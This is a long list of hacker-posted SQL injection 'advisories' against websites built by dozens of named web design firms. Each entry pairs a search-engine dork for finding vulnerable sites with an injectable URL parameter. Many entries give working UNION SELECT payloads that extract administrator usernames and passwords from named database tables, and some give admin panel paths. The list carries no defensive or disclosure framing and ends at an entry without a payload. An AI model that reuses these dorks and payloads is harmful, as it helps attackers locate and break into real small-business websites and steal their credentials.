Email : ehsan_hp...@hotmail.com
Vendor : http://www.mainickweb.com/
Dork : Designed by MaiNick inurl:ricetta.php?id=
Exploite: www.victim.com/ricetta.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Abarkam (detail.php?input) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.abarkam.com/
Dork : allinurl:detail.php?input=
Exploite: www.victim.com/detail.php?input=[SQL]
SpeCial TanX To : Skote_Vahshat

TTW (ricetta.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.tamtamsrl.it/
Dork : credits ttw inurl:ricetta.php?id=
Exploite: www.victim.com/ricetta.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

ITTWeb Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.ittweb.net/
Dork : Web Design By I.T.T inurl:?id=
Exploite: www.victim.com/prodotto.php?id=[SQL]
www.victim.com/index.php?command=searchtype=newsid=[SQL]
SpeCial TanX To : Skote_Vahshat

Sana Net (viewpages.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.sana-net.com/
Dork : inurl:viewpages.php?id= طراحي و برنامه نویسی از شرکت طراحان سنا نت
Exploite: www.victim.com/viewgal.php?op=-1 union select 1,concat(username,0x3a,password),3,4 from manager
Admin Panel : www.victim.com/adminsite/login-form.php
SpeCial TanX To : Skote_Vahshat

Olonet (prodotto.php?idproduct) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.olonet.net/
Dork : Powered designed by Olonet.net
Exploite: www.victim.com/prodotto.php?idproduct=[SQL]
SpeCial TanX To : Skote_Vahshat

Mediagrafic (prodotto.asp?id) (records.asp?id_p) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.mediagrafic.eu/
Dork : Powered by Mediagrafic.it
Exploite: www.victim.com/prodotto.asp?id=-1992 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from config
www.victim.com/records.asp?id_p=[SQL]
SpeCial TanX To : Skote_Vahshat

CWM (dettaglio-prodotto.asp?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.cynaskyweb.it/
Dork : Powered by CWM inurl:dettaglio-prodotto.asp?id=
Exploite: www.victim.com/dettaglio-prodotto.asp?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Sana Net (viewnews.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.sana-net.com/
Dork : inurl:viewnews.php?id= طراحي و برنامه نویسی از شرکت طراحان سنا نت
Exploite: www.victim.com/viewnews.php?id=-null/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null/**/from/**/manager
SpeCial TanX To : Skote_Vahshat

bizConsulting (prodotto.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.bizconsulting.it/
Dork : Powered by: bizConsulting inurl:prodotto.php?id=
Exploite: www.victim.com/prodotto.php?id=-1 union select concat(username,0x3a,password),2 from adm_amministratori
SpeCial TanX To : Skote_Vahshat

webyuss (prodotto.php?id) (quadri.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.webyuss.com/
Dork : Powered by webyuss inurl:prodotto.php?id=
Exploite: www.victim.com/prodotto.php?id=[SQL]
Dork : Powered by webyuss inurl:quadri.php?id=
Exploite: www.victim.com/quadri.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Pc Web Agency (prodotto.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.pcwebagency.it/
Dork : Powered by Pc Web Agency inurl:prodotto.php?id=
Exploite: www.victim.com/prodotto.php?id=-Null union select 1,user,pswd,4,5,6,7,8,9,10,11,12,13,14,15,16 from login
SpeCial TanX To : Skote_Vahshat

phpWebSite (publisher) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Dork : allinurl:mod.php?mod=publisher
Exploite: www.victim.com/mod.php?mod=publisherop=allmediaartid=-1 union select concat(aid,0x3a,pwd) from authors
Exploite 2 : www.victim.com/mod.php?mod=publisherop=allmediaartid=-1 union select concat(aid,0x3a,pwd) from authors
SpeCial TanX To : Skote_Vahshat

Fabio Rispoli (prodotto.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Dork : Powered by Fabio Rispoli
Exploite: www.victim.com/prodotto.php?id=6+union+select 1,username,password,4,5,Null+from+utenti--
SpeCial TanX To : Skote_Vahshat

Marketing Development (prodotto.php?cat) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.marketingdev.com
Dork : powered by Marketing Development inurl:prodotto.php?cat=
Exploite: www.victim.com/prodotto.php?cat=[SQl]
SpeCial TanX To : Skote_Vahshat

Datriks Solutions (prodotto.php?id) (dettaglio_socio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.datriks.net/
Dork : Powered by Datriks Solutions inurl:prodotto.php?id=
Exploite: www.victim.com/new/prodotto.php?id=[SQl]
Dork : Powered by Datriks Solutions inurl:dettaglio_socio.php?id=
Exploite: www.victim.com/dettaglio_socio.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Multimedia Creative (prodotto.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.multimediacreative.it/
Dork : Powered by Multimedia Creative inurl:prodotto.php?id=
Exploite: www.victim.com/prodotto.php?id=[SQl]
SpeCial TanX To : Skote_Vahshat

B-Keen communication (dettaglio_news.phpid) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.b-keen.it/
Dork : Powered by B-Keen communication inurl:dettaglio_news.php
Exploite: www.victim.com/index.php?pagina=dettaglio_news.phpid=[SQL]
Example : http://www.victim.com/index.php?pagina=dettaglio_news.phpid=0 union select null,null,@@version,database(),null,null,null,null,null--
SpeCial TanX To : Skote_Vahshat

BUZLAB (prodotti.php?idCategoria) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.buzlab.com/
Dork : Produced by BUZLAB inurl:prodotti.php?idCategoria=
Exploite: www.victim.com/prodotti.php?idCategoria=[SQL]
SpeCial TanX To : Skote_Vahshat

Foresta Creativa (prodotti.php?idCategoria) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.forestacreativa.com/
Dork : Powered by Foresta Creativa inurl:prodotti.php?idCategoria=
Exploite: www.victim.com/prodotti.php?idCategoria=[SQL]
SpeCial TanX To : Skote_Vahshat

Web Progetto (prodotti.php?idcategoria) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.webprogetto.it/
Dork : by Web Progetto inurl:prodotti.php?idcategoria=
Exploite: www.victim.com/prodotti.php?idcategoria=-9+union+select+1,user,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from auth_user--
SpeCial TanX To : Skote_Vahshat

Marinet Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.marinet.gr/
Dork : Powered by Marinet inurl:products.php?categoryid=
Exploite : www.victim.com/products.php?categoryid=[SQL]
Example : http://www.bestsecurity.gr/products.php?categoryid=1'
Dork : Powered by Marinet inurl:location.php?id=
Exploite: www.victim.com/location.php?id=[SQL]
Dork : Powered by Marinet inurl:info-more.php?id=
Exploite: www.victim.com/info-more.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Web Art Studio (prodotto.php?lang) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.was.it/
Dork : Web Art Studio Web Agency inurl:prodotto.php?lang=
Exploite: www.victim.com/prodotto.php?lang=[SQL]
SpeCial TanX To : Skote_Vahshat

Listendifferent (prodotto.php?IDprodotto) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.listendifferent.com/
Dork : Concept and Designed by Listendifferent.com
Exploite: www.victim.com/fra/prodotto.php?IDprodotto=-9 union select 1,version(),user(),6,5,6,7,8,9,10
SpeCial TanX To : Skote_Vahshat

ValtNet (photogallery.html?id_categoria) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.valtnet.com/
Dork : allinurl:photogallery.html?id_categoria=
Exploite: www.victim.com/photogallery.html?id_categoria=-0 union select 1,2,concat(username,0x3a,password),4,5,6 from v_utente
Or : www.victim.com/photogallery.html?id_categoria=-0 union select 1,2,concat(username,0x3a,password),4,5 from v_utente
SpeCial TanX To : Skote_Vahshat

CreatiWeb Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.crweb.it/
Dork : Powered by CreatiWeb inurl:dettaglio_news.php?id=
Exploite: www.victim.com/dettaglio_news.php?id=[SQL]
Dork : Powered by CreatiWeb inurl:photo.php?album=
Exploite : www.victim.com/photo.php?album=[SQL]
Dork : Powered by CreatiWeb inurl:gallery.asp?id=
Exploite : www.victim.com/gallery.asp?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Alfazeta (list-prodotti.php?idcategoria) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.alfazeta.net/
Dork : inurl:list-prodotti.php?idcategoria=
Exploite: www.victim.com/list-prodotti.php?idcategoria=[SQL]
SpeCial TanX To : Skote_Vahshat

Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.warah.com.ar/
Dork : DESIGN BY WARAH AGENCIA CREATIVA
Exploite: www.victim.com/productos.php?categoria_id=[SQL]
SpeCial TanX To : Skote_Vahshat

Simply Media Web (archivio.asp?categoria_id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.simplymediaweb.it/
Dork : Powered by Simply Media Web inurl:archivio.asp?categoria_id=
Exploite: www.victim.com/archivio.asp?categoria_id=[SQL]
SpeCial TanX To : Skote_Vahshat

Dataminas (noticias.php?categoria_id) (galeria.php?galeria_id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.dataminas.com.br/
Dork : Powered by DATAMINAS.COM.BR
Exploite: www.victim.com/noticias.php?categoria_id=[SQL]
www.victim.com/galeria.php?galeria_id=[SQL]
SpeCial TanX To : Skote_Vahshat

Nafis Group (review.php?ID) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Dork : Powered by : Nafis Group
Exploite: www.victim.com/review.php?ID=[SQL]
SpeCial TanX To : Skote_Vahshat

Nativedreams (Fabarth_gallery.php?categoria_id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.nativedreams.com/
Dork : inurl:Fabarth_gallery.php?categoria_id=
Exploite: www.victim.com/Fabarth_gallery.php?categoria_id=1+union+select+1,2,version(),4,5,6
SpeCial TanX To : Skote_Vahshat

Data Center Foz (product_cat.php?CATEGORIA_ID) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Dork : Powered by DataCenterFoz
Exploite: www.victim.com/product_cat.php?CATEGORIA_ID=[SQL]
SpeCial TanX To : Skote_Vahshat

LAB GRAPHIC DESIGN (index.php?categoria_id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Dork : Powered by LAB GRAPHIC DESIGN
Exploite: www.victim.com/index.php?categoria_id=Null Union Select @@version
SpeCial TanX To : Skote_Vahshat

ALTOGRADO (catalogo.php?id_categoria) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.altogrado.com.ar/
Dork : Powered by ALTOGRADO inurl:catalogo.php?id_categoria=
Exploite: www.victim.com/catalogo.php?id_categoria=[SQL]
SpeCial TanX To : Skote_Vahshat

Grupo Argentina Web Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://grupoargentinaweb.com/
Dork : Designed powered by GAW GrupoArgentinaWeb inurl:gal_productos.php?idioma
Exploite: www.victim.com/gal_productos.php?idioma=Ehsan_Hp200id_categoria=[SQL]
Dork : Designed powered by GAW GrupoArgentinaWeb inurl:servicios_detalle.php?seid=
Exploite: www.victim.com/servicios_detalle.php?seid=[SQL]
SpeCial TanX To : Skote_Vahshat

dedacom (dettaglio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.dedacom.it/
Dork : powered by dedacom inurl:dettaglio.php?id=
Exploite: www.victim.com/dettaglio.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

dpconsulenze (dettaglio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.dpconsulenze.eu/
Dork : powered by dpconsulenze inurl:dettaglio.php?id=
Exploite: www.victim.com/sito/dettaglio.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

ECHO Creative Company (dettaglio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.echocreative.it/index.htm
Dork : Powered by ECHO Creative Company inurl:dettaglio.php?id=
Exploite: www.victim.com/maglie/dettaglio.php?id=-1 union select 1,concat(version(),0x3a,user(),database()),3,4,5,6,7,8
SpeCial TanX To : Skote_Vahshat

Muzedon (dettaglio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Dork : Powered By Muzedon.com inurl:dettaglio.php?id=
Exploite: www.victim.com/dettaglio.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

netplanet (dettaglio.asp?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.netplanet.it/
Dork : Powered by netplanet inurl:dettaglio.asp?id=
Exploite: www.victim.com/dettaglio.asp?id=[SQL]
SpeCial TanX To : Skote_Vahshat

InYourLife (dettaglio.php?id) (dettaglio_immobile.php?id) (notizia.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.inyourlife.info/
Dork : Powered by InYourLife inurl:dettaglio.php?id=
Exploite: www.victim.com/dettaglio.php?id=[SQL]
Dork : Powered by InYourLife inurl:dettaglio_immobile.php?id=
Exploite: www.victim.com/dettaglio_immobile.php?id=[SQL]
Dork : Powered by InYourLife inurl:notizia.php?id=
Exploite: www.victim.com/notizia.php?id=[SQL]
SpeCial TanX To : Skote_Vahshat

lab382 (dettaglio.php?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.lab382.com/
Dork : Web site by: lab382.com inurl:dettaglio.php?id=
Exploite: www.victim.com/news/dettaglio.php?id=+9 union select 1,user_pswd,3,4,5,6,7,8 from utenti
SpeCial TanX To : Skote_Vahshat

WebRising (dettaglio.asp?id) Remote SQL injection Vulnerability
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.webrising.it/
Dork : www.webrising.it inurl:dettaglio.asp?id=
Exploite: www.victim.com/dettaglio.asp?id=[SQL]
SpeCial TanX To : Skote_Vahshat

Xplace Company (dettaglio.asp?id) (alloggi-dett.asp?id) (eventi.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Xplace Company (dettaglio.asp?id) (alloggi-dett.asp?id) (eventi.asp?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email : ehsan_hp...@hotmail.com
Vendor : http://www.xplacecompany.com/
Persian Gulf 4 Ever!
Dork : Powered by Xplace Realizzazione siti web inurl:.asp?id=
Exploite:
www.victim.com/dettaglio.asp?id=[SQL]
www.victim.com/alloggi-dett.asp?id=[SQL]
www.victim.com/eventi.asp?id=[SQL]
SpeCial TanX To : Skote_Vahshat
IRANIAN THE BEST HACKERS IN THE WORLD
Neox (categoria.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Neox (categoria.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.neox.es/
Persian Gulf 4 Ever!
Dork : inurl:categoria.php?id= Diseño web - Málaga
Exploite: www.victim.com/categoria.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
QOLQA (categoria.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
QOLQA (categoria.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.qolqa.com/
Persian Gulf 4 Ever!
Dork : QOLQA inurl:categoria.php?id=
Exploite: www.victim.com/categoria.php?id=-10 union select 1,2,3,4,5,6 from login--
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
PCVmedia (free_gallery.php?cat_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.pcvmedia.com/
Persian Gulf 4 Ever!
Dork : Website designed developed by PCVmedia.com inurl:free_gallery.php?cat_id=
Exploite: www.victim.com/free_gallery.php?cat_id=-1 union select 1,2,concat(username,0x3,password),4,5,6 from cs_admin
Admin Panel : www.victim.com/admin
SpeCial TanX To : Dj7Xpl , Skote_Vahshat
IRANIAN THE BEST HACKERS IN THE WORLD
CdeVision(students.php?id) (gallery.php?cat) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
CdeVision(students.php?id) (gallery.php?cat)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.cdevision.com/
Persian Gulf 4 Ever!
Dork : Site by cdeVision inurl:students.php?id=
Exploite: www.victim.com/students.php?id=[SQL]
Dork : Site by cdeVision inurl:gallery.php?cat=
www.victim.com/gallery.php?cat=[SQL]
SpeCial TanX To : Dj7Xpl , Skote_Vahshat
IRANIAN THE BEST HACKERS IN THE WORLD
DoodleIT (gallery.php?id) (about.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
DoodleIT (gallery.php?id) (about.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.doodleit.co.uk/
Persian Gulf 4 Ever!
Dork : Design by DoodleIT inurl:gallery.php?id=
Exploite: www.victim.com/gallery.php?id=[SQL]
Dork : Design by DoodleIT inurl:about.php?id=
Exploite: www.victim.com/about.php?id=[SQL]
SpeCial TanX To : Dj7Xpl , Skote_Vahshat
IRANIAN THE BEST HACKERS IN THE WORLD
BACKEND (categoria.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
BACKEND (categoria.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.backend.com.mx/
Persian Gulf 4 Ever!
Dork : Desarrollado por BACKEND Diseños Web inurl:categoria.php?id=
Exploite: www.victim.com/categoria.php?id=[SQL]
SpeCial TanX To : Dj7Xpl , Skote_Vahshat
IRANIAN THE BEST HACKERS IN THE WORLD
SAY Comunicacion (producto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
SAY Comunicacion (producto.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.saycomunicacion.com/
Persian Gulf 4 Ever!
Dork : Diseno Web:SAY Comunicacion inurl:producto.php?id=
Exploite: www.victim.com/producto.php?id=[SQL]
SpeCial TanX To : Dj7Xpl , Skote_Vahshat
IRANIAN THE BEST HACKERS IN THE WORLD
Arte Dude (collections.php?id) (property.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Arte Dude (collections.php?id) (property.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.artdudegraphics.com/
Persian Gulf 4 Ever!
Dork : inurl:property.php?id= an art dude graphics design
Exploite: www.victim.com/pages/property.php?id=-9/**/Union/**/Select/**/Null,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,Null
Dork : inurl:collections.php?id= an art dude graphics design
Exploite: www.victim.com/pages/collections.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Web Design Sydney (news-item.php?id) (news-item.php?newsid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Web Design Sydney (news-item.php?id) (news-item.php?newsid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.milkdigital.com.au/
Persian Gulf 4 Ever!
Dork : web design sydney - MILK Digital inurl:news-item.php?id=
Exploite: www.victim.com/news-item.php?id=[SQL]
Dork : web design sydney - MILK Digital inurl:news-item.php?newsid=
Exploite: www.victim.com/news-item.php?newsid=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Avant-Garde Technologies (display-section.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Avant-Garde Technologies (display-section.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.agtsindia.com/
Persian Gulf 4 Ever!
Dork : Powered by Avant-Garde Technologies inurl:display-section.php?id=
Exploite: www.victim.com/display-section.php?id=-1 union select null,concat(user(),0x3a,version(),0x3a,database()),null
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Liberating IT (picture.php?gid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Liberating IT (picture.php?gid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.liberatingit.com/
Persian Gulf 4 Ever!
Dork : Web Design by LiberatingIT.com inurl:picture.php?gid=
Exploite: www.victim.com/picture.php?gid=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Amigot Corp (story.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Amigot Corp (story.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://amigot.com/
Persian Gulf 4 Ever!
Dork : Powered By Amigot Corp inurl:story.php?id=
Exploite: www.victim.com/story.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
6House Design (product_details.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
6House Design (product_details.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://sixhousedesign.com/
Persian Gulf 4 Ever!
Dork : Designed By: 6House Design inurl:product_details.php?id=
Exploite: www.victim.com/products/product_details.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
THE STUDIO (prod.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
THE STUDIO (prod.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.thestudio.net/
Persian Gulf 4 Ever!
Dork : Site designed by The Studio, INC. inurl:prod.php?id=
Exploite: www.victim.com/prod.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
SEO New York (prod.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
SEO New York (prod.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.eyesonnet.com/
Persian Gulf 4 Ever!
Dork : Powered by:SEO New York inurl:prod.php?id
Exploite: www.victim.com/prod.php?id=-1 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6--
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
EasyContent CMS (participant.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
EasyContent CMS (participant.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.emmattweb.com/
Persian Gulf 4 Ever!
Dork : Powered by EasyContent CMS inurl:participant.php?id=
Exploite: www.victim.com/participant.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Chezola Systems (display-section.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Chezola Systems (display-section.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://chezolasystems.com/
Persian Gulf 4 Ever!
Dork : Powered by Chezola Systems Canada Inc
Exploite: www.victim.com/display-section.php?id=-1992 union select Null,concat(admin_name,0x3a,admin_password),Null from wantiti_admin
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Kimia Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Kimia
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.kimia.co.za/
Persian Gulf 4 Ever!
